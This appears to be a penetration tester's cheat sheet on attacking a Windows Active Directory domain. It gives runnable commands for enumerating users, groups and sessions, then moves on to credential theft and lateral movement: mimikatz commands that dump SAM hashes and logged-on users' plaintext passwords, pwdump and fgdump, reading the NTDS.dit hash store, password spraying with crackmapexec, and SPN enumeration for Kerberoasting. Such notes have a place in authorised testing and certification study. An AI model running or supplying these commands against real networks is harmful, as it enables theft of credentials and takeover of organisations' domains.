Comment on page
Enumeration
Users / Groups / Computers
- Look for users with high-privs across the domain e.g. Domain Admins or Derivative Local Admins
- Look for custom groups.
# get all users in the domain # are there any weird domains?
cmd> net user /domain
cmd> net user [username] /domain
# get all groups in the domain
cmd> net group /domain
cmd> net group [groupname] /domain
# get all computers in domain
cmd> net view
cmd> net view /domain
# get resources/shares of specified computer
cmd> net view \\[computer_name] /domain
If you can't get all the domain members info, you might want to check the priv (whoami /priv)
Check the UAC is enabled (if you're not able to execute executables that you uploaded like mimikatz)
- WinPeas may reveal plaintext pass.
Dumping creds
if it's not launghed from a SYSTEM, we need to run
token::elevate after privilege::debuf
# dump NTLM hashes + plaintext creds
mimikatz > lsadump::sam # dump contents of SAM db in current host
mimikatz > sekurlsa::logonpasswords # dump creds of logged-on users
Other tools
cmd> pwdump.exe localhost
cmd> fgdump.exe localhost # improved pwdump, shutdown firewalls
cmd> type C:\Windows\NTDS\NTDS.dit # all domain hashes in NTDS.dit file on the Domain Controller
Are there any pattens in users passwords? Can we make a password list and do a password spray?
crackmapexec smb IP -u user.txt -p pass.txt --continue-on-success
Then try RDP
rdesktop -r disk:tmp=/home/kali/transfer -u domain_name\\user_name -p Password IP_+addr
- by setting a disk argument, we can see and transfer all the files from the directory as a share. It's super useful.
Service Principal Names (AD Service Accounts)
- A SPN is a unique name for a service on a host, used to associate with an Active Directory service account.
- Enum SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.
- Query the Domain Controller in search of SPNs.
- SPN Examples
CIFS/MYCOMPUTER$
- file share access.LDAP/MYCOMPUTER$
- querying AD info via. LDAP.HTTP/MYCOMPUTER$
- Web services such as IIS.MSSQLSvc/MYCOMPUTER$
- MSSQL.
- Perform
nslookup
of the service hostname -> see if there is an entrypoint here. - Automated SPN enum scripts:
# Kerberoast: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
PS> .\GetUserSPNs.ps1
# Powershell Empire: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
PS> .\Get-SPN.ps1
Logged-in users and active user sessions.
- More powerview commands https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview
PS> Set-ExecutionPolicy Unrestricted
PS> Import-Module .\PowerView.ps1
PS> Get-NetLoggedon -ComputerName [computer_name] # enum logged-in users
PS> Get-NetSession -ComputerName [domain_controller] # enum active user sessions
Domain Controller hostname (PdcRoleOwner)**
PS> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Last modified 1yr ago